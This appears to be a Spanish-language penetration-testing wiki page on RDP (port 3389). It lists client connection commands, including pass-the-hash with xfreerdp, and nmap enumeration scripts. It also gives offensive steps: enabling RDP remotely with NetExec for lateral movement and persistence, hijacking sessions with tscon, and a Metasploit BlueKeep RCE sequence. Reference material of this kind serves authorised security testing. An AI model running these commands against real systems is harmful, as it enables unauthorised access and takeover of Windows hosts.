RDP - 3389/TCP

Puerto/s

3389

Protocolo/s

TCP

Conexión remota a servicios RDP

Windows

mstsc

https://learn.microsoft.com/es-es/windows-server/administration/windows-commands/mstsc

IP='192.168.1.100'
PORT='3389'
mstsc /v:$IP:$PORT

Linux

rdesktop

Cliente RDP clásico para sistemas Linux.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
IP='192.168.1.100'

rdesktop -u $USER -p $PASS $IP
rdesktop -d $DOMAIN -u $USER -p $PASS $IP

xfreerdp

Cliente RDP moderno y versátil, soporta autenticación por contraseña o hash NTLM.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
HASH='xxxxxxxxxxx'
IP='192.168.1.100'

xfreerdp /u:$DOMAIN\$USER /p:$PASS /v:$IP /cert:ignore
xfreerdp /u:$DOMAIN\$USER /pth:$HASH /v:$IP /cert:ignore +clipboard /dynamic-resolution

Remmina

Cliente gráfico multiplataforma.

sudo apt install remmina

CLI:

remmina -c rdp://$USER@$IP
remmina -c rdp://$DOMAIN\\$USER@$IP
remmina -c rdp://$USER:$PASS@$IP

GUI:

Enumeración

Nmap

Enumeración de versión, cifrado y detección de vulnerabilidades:

nmap -p 3389 -sV -oA nmap/rdp_service -iL scope/scope.txt

nmap -T4 -p 3389 --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -oA nmap/rdp_scripts -iL scope/scope.txt

rdp-sec-check

Herramienta en Perl para auditar la configuración de seguridad de RDP.

git clone "https://github.com/CiscoCXSecurity/rdp-sec-check.git"

IP='192.168.1.100'
./rdp-sec-check.pl $IP

./rdp-sec-check.pl --file scope.txt --timeout 15 --retries 3 --outfile rdpseccheck.log --verbose

[AD] Equipos dentro del grupo "Remote Desktop Users"

Enumeración de equipos que pertenecen al grupo de RDP.

Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

Técnicas

Habilitar servicio RDP remotamente

Mediante el módulo -M rdp de NetExec es posible habilitar el servicio RDP en un host Windows remoto utilizando credenciales válidas de un usuario con privilegios administrativos. Esto se realiza a través de SMB, modificando internamente el registro del sistema remoto.

Objetivo: Habilitar RDP para permitir el acceso remoto al escritorio del sistema comprometido, facilitando el movimiento lateral o la persistencia en entornos Windows.

Para ello:

Internamente, se modifican claves del registro para habilitar fDenyTSConnections y abrir el puerto 3389 si es necesario.
Requiere privilegios administrativos válidos sobre el host remoto.
No establece una sesión RDP, solo habilita el servicio.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
HASH='xxxxxxxxxxx'
IP='192.168.1.100'

netexec smb $IP -u $USER -p $PASS -M rdp -o ACTION=enable
netexec smb $IP -u $DOMAIN\\$USER -p $PASS -M rdp -o ACTION=enable

Permite al atacante preparar el entorno para una conexión interactiva, facilita el movimiento lateral (usando herramientas como xfreerdp, rdesktop, rubeus o incluso RDP GUI), y puede establecer una puerta de entrada persistente si no se detecta y revierte.

Clasificación MITRE ATT&CK:

Nivel

Técnica

Táctica

Lateral Movement / Persistence

—

Técnica

Remote Services: SMB/Windows Admin Shares

T1021.002

Subtécnica

Remote Services: Remote Desktop Protocol

T1021.001

Técnica relacionada

Modify Registry

T1112

Ataques

Secuestro de sesión RDP (`tscon`)

Requiere privilegios en el sistema remoto con sesión activa.

query user
tscon $ID /dest:$SESSIONNAME

Vulnerabilidades

Bluekeep - CVE-2019-0708

https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2019-0708

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS TARGET_IP
set LHOST YOUR_IP
exploit

Referencias

AnteriorIPMI - 623/udp/tcp SiguienteRedis - 6379/tcp

Última actualización hace 9 meses

hashtagConexión remota a servicios RDP

hashtagWindows

hashtagmstsc

hashtagLinux

hashtagrdesktop

hashtagxfreerdp

hashtagRemmina

hashtagEnumeración

hashtagNmap

hashtagrdp-sec-check

hashtag[AD] Equipos dentro del grupo "Remote Desktop Users"

hashtagTécnicas

hashtagHabilitar servicio RDP remotamente

hashtagAtaques

hashtagSecuestro de sesión RDP (tscon)

hashtagVulnerabilidades

hashtagBluekeep - CVE-2019-0708

hashtagReferencias